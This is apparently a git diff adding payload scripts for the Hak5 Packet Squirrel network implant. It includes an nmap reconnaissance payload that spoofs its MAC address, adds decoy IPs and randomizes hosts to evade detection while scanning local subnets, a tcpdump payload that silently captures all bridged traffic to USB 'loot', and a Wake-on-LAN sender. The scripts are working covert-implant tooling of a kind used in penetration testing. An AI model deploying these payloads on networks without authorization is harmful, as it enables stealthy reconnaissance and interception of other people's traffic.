+# Category: sniffing +# Target: Any +# Net Mode: TRANSPARENT + +# Updated to the Packet Squirrel Mark II by Hak5 + +# LEDs +# SUCCESS: Scan complete +# FAIL: No USB storage found +# SCANNING: Rapid White + +#### Constants #### + +# If you know which interface will allow outbound traffic you can specify it here +# leaving it blank will enable the payload trying to attempt to figure out which +# interface to use. +defaultInterface="lo" + + +# Number of decoy IPs to spawn +rndDecoyNumber=5 + +# Spoof the MAC of this device type +spoofDevType="Cisco" + +# Seconds to sleep while loading NAT +netSleep=10 + +# Squirrel NETMODE TRANSPARENT | BRDIGE | NAT | NONE +# BRIDGE mode will preserve the Squirrel IP +mode="BRIDGE" + +# When done what should we do? reboot | halt | nothing | poweroff +onEnd="halt" + +# Path to store results +lootPath="/usb/loot/nmapdump" + +# File name scheme +lootFileNameScheme="nmapdump_$(date +%Y-%m-%d-%H%M)" + +# Clear the log every run? +clearLogs=true + +#### Payload Code #### + +function finish() { + + # Sync filesystem + sync + + # Indicate successful shutdown + LED B SUCCESS + sleep 1 + + # Halt the system + LED OFF + + case "$onEnd" in + "poweroff") poweroff ;; + "reboot") reboot ;; + "halt") halt ;; + "nothing") echo "see ya!" >> $lootPath/log.txt ;; + *) reboot;; + esac + +} + +function run() { + + # Create loot directory + mkdir -p $lootPath &> /dev/null + + # Clear the logs + if [ "${clearLogs}x" == "truex" ]; then + echo > ${lootPath}/log.txt + fi + + # Set networking mode to user preferance and sleep to allow time to sync up. + # If set to NONE this will not be set and thus not kick you out of your SSH session. + if [ "$mode" != "NONE" ]; then + + NETMODE $mode + sleep $netSleep + + fi + + # Log ifconfig data; helpful for troubleshooting + ifconfig >> $lootPath/log.txt + + # Starting scanning LED (rapid white blink) + LED W VERYFAST + + # Run nmap scan with options + + # Now lets figure out which interface to use. + iface=$(ip -o link show | awk '{print $2}') + + # Set ipv6 default to null + ipv6="" + + # Now lets look at the ip addresses assigned to the various interfaces. + while IFS= read -r line; do + + # Standardize interface name + line="${line//:}" + + # We can skip lo + if [ "$line" != "lo" ]; then + + # Get IP Address for Interface. + ifip=$(ifconfig $line 2>/dev/null|awk '/inet addr:/ {print $2}'|sed 's/addr://') + + # Make sure result is not null. + if [ "$ifip" ]; then + + # Store for later use the ip addresses associted with interface. + # We don't want an empty 1st line. + if [ "$ipaddresses" ]; then + ipaddresses+=$'\n'$ifip + else + ipaddresses=$ifip + fi + + # If user has specified a default interface than we can disregard. + if [ ! "$defaultInterface" ]; then + + # Store the interface for later use. + # We don't want an empty 1st line. + if [ "$interfaces" ]; then + interfaces+=$'\n'$line + else + interfaces=$line + fi + fi + + # convert ip to subnet + newSubNet=`echo $ifip | cut -d"." -f1-3` + newSubNet=$newSubNet".1/24" + + # Add subnet to list + # We don't want a leading empty character. + if [ "$newSubNet" ]; then + targets+=" $newSubNet" + else + targets=$newSubNet + fi + + fi + + fi # end our test for lo + + done <<< "$iface" # loop to gather IP addresses + + # Clean up subnets to remove accidental double spaces. + echo "$targets" | awk '$1=$1' &> /dev/null + + # if targets is empty we have no subnets. Let's check if we can find IPv6 + if [ ! "$targets" ]; then + + # Collect all uniqu IPv6 address that we can ping. + ipv6=$(ping -6 ff02::1 -w 10 2>/dev/null | awk '/from/ {print $4}' | cut -d":" -f1-6 | sort | uniq | tr "\r\n" " ") + if [ ! "$ipv6" ]; then + + # We could not find any ipv4 address and ipv6 returned nothing. + echo "Could not accquire any IP addresses to scan." >> $lootPath/log.txt + sync + LED OFF + exit 1 + fi + fi + + # Add lo as some setups the loopback maybe the interface to send out traffic + # If user supplies default interface tie in their selection and disregard the + # auto locate data. + if [ ! "$defaultInterface" ]; then + interfaces+=$'\nlo' + else + interfaces=$defaultInterface + fi + + # log subnets and ip addresses we found + echo "Subnets to scan $targets" >> $lootPath/log.txt + echo "IPs to scan $ipaddresses" >> $lootPath/log.txt + + # Document the fact we will be scanning ipv6 + if [ "$ipv6" ]; then + echo "We will be scanning ipv6 addresses" >> $lootPath/log.txt + fi + + # Now lets find the interface that will allow outbound traffic on the LAN. + while IFS= read -r interface; do + + # We will use the ip addresses we found to see if this interface can ping it. + while IFS= read -r ip; do + + # If we can send ping packets then the interface is likley able to work with nmap + # Determin if we should ping in ipv4 or ipv6 + if [ ! "$ipv6" ]; then + + if [[ ! $(ping -I $interface $ip -w 3 | grep '0 packets received') ]]; then + + # Make sure wee don't end up with a blank first line. + if [ "$goodInterface" ]; then + + goodInterfaces+=$'\n'$interface + else + goodInterfaces=$interface + fi + fi + + else + + if [[ ! $(ping -6 ff02::1 -w 3 | grep '0 packets received') ]]; then + + # Make sure wee don't end up with a blank first line. + if [ "$goodInterface" ]; then + + goodInterfaces+=$'\n'$interface + else + goodInterfaces=$interface + fi + fi + + fi + + done <<< "$ipaddresses" # end loop to find interfaces we can use + + done <<< "$interfaces" # end loop to scan interfaces + + # Log interfaces we can use + echo "Interfaces allowing outbound traffic: $goodInterfaces" >> $lootPath/log.txt + + # Make sure we have interfaces that will allow outbound traffic. + if [ "$goodInterfaces" ]; then + while IFS= read -r goodInterface; do + + # Finally! Lets run NMap! + # Use ipv4 + if [ ! "$ipv6" ]; then + nmap -Pn -e $goodInterface -sS -F -sV -oA $lootPath/$lootFileNameScheme -D RND:$rndDecoyNumber --randomize-hosts --spoof-mac $spoofDevType $targets >> $lootPath/log.txt + else + # Use ipv6 + nmap -Pn -e $goodInterface -sT -F -R -oA $lootPath/$lootFileNameScheme --randomize-hosts --spoof-mac $spoofDevType -6 $ipv6 >> $lootPath/log.txt + fi + + done <<< "$goodInterfaces" + + else + echo "Could not find any interfaces that will allow outbound traffic." >> $lootPath/log.txt + exit 1 + fi + + + # Done scanning; clean up. + finish + +} # end run() function + +USB_WAIT + +# Show attack LED +LED ATTACK + +# ATTACK!!!! +run + diff --git a/payloads/remote-access/wake_on_lan/README.md b/payloads/remote-access/wake_on_lan/README.md new file mode 100644 index 0000000..2125eae --- /dev/null +++ b/payloads/remote-access/wake_on_lan/README.md @@ -0,0 +1,7 @@ +# Wake-on-LAN + +This payload generates a WoL (Wake-on-LAN) magic packet for the devices listed in the +payload configuration. + +Make sure to copy BOTH `payload` and `wol_python.py` to the SAME payload directory on +the Packet Squirrel! diff --git a/payloads/remote-access/wake_on_lan/payload b/payloads/remote-access/wake_on_lan/payload new file mode 100755 index 0000000..c91aaf0 --- /dev/null +++ b/payloads/remote-access/wake_on_lan/payload @@ -0,0 +1,37 @@ +#!/bin/bash + +# Title: Wake on Lan +# Description: Wake On Lan with Python +# Author: Hak5 + +# Configuration + +# MAC addresses, separated by spaces +WOL_TARGETS="11:22:33:44:55:66 AA:BB:CC:DD:EE:FF" + +# How often do we wake up systems, in seconds? +WOL_INTERVAL=30 + + + + +# NAT mode +NETMODE NAT + +# Set the LED +LED G SINGLE + +while true; do + # Toggle the LED, send the WoL + LED W SOLID + python /root/payloads/$(SWITCH)/python_wol.py ${WOL_TARGETS} + + # Wait one second for the LED to be visible + sleep 1 + + # Reset the LED + LED G SINGLE + + # Wait the wakeup interval + sleep ${WOL_INTERVAL} +done diff --git a/payloads/remote-access/wake_on_lan/python_wol.py b/payloads/remote-access/wake_on_lan/python_wol.py new file mode 100755 index 0000000..a00fe4d --- /dev/null +++ b/payloads/remote-access/wake_on_lan/python_wol.py @@ -0,0 +1,21 @@ +#!/usr/bin/python + +import sys +import socket + +# Simplified function to send a wake-on-lan packet +def send_wol(destination): + sync = "FF" * 6 + macs = destination * 16 + payload = bytes.fromhex(sync + macs) + + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) + sock.sendto(payload, ("255.255.255.255", 9)) + +# Send a WoL packet for each MAC address we +# were called with +for mac in sys.argv[1:]: + fin_mac = mac.replace(":", "") + send_wol(fin_mac) + diff --git a/payloads/sniffing/tcpdump/payload b/payloads/sniffing/tcpdump/payload new file mode 100755 index 0000000..8992553 --- /dev/null +++ b/payloads/sniffing/tcpdump/payload @@ -0,0 +1,72 @@ +#!/bin/bash +# +# Title: TCPDump +# Description: Dumps networking-data to USB storage. Completes on button-press or storage full. +# Author: Hak5 +# Version: 1.0 +# Category: sniffing +# Target: Any +# Net Mode: TRANSPARENT + +# LEDs +# SUCCESS: Dump complete +# FAIL: No USB storage found + +function monitor_space() { + while true + do + [[ $(USB_FREE) -lt 10000 ]] && { + kill $1 + LED G SUCCESS + sync + break + } + sleep 5 + done +} + +function finish() { + # Kill TCPDump and sync filesystem + kill $1 + wait $1 + sync + + # Indicate successful shutdown + LED R SUCCESS + sleep 1 + + # Halt the system + LED OFF + halt +} + +function run() { + # Create loot directory + mkdir -p /usb/loot/tcpdump &> /dev/null + + # Set networking to TRANSPARENT mode and wait five seconds + NETMODE TRANSPARENT + sleep 5 + + LED ATTACK + + # Start tcpdump on the bridge interface + tcpdump -i br-lan -s 0 -w /usb/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null & + tpid=$! + + # Wait for button to be pressed (disable button LED) + NO_LED=true BUTTON + finish $tpid +} + + +# This payload will only run if we have USB storage + +# Wait for the USB drive +USB_WAIT + +LED ATTACK +run & +monitor_space $! & + +wait